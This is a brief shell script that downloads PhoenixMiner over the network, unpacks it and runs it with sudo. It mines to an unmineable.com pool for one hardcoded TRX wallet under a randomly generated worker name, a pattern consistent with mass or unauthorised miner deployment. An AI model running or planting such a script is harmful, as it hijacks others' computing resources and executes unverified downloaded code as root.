#!/bin/sh
apt-get install libpci3 && wget https://phoenixminer.info/downloads/PhoenixMiner_5.7b_Linux.tar.gz && tar -xf PhoenixMiner_5.7b_Linux.tar.gz && cd PhoenixMiner_5.7b_Linux && sudo ./PhoenixMiner -pool etchash.unmineable.com:3333 -wal TRX:TPQwsYETz17e5Xka2aqMwSXRtfGCaPbhzH.$(echo $(shuf -i 2-100 -n 1)-$(shuf -i 1-1000 -n 1)-Phoenix#ln9q-3xm0) -pass x -mi 14 -gt 400
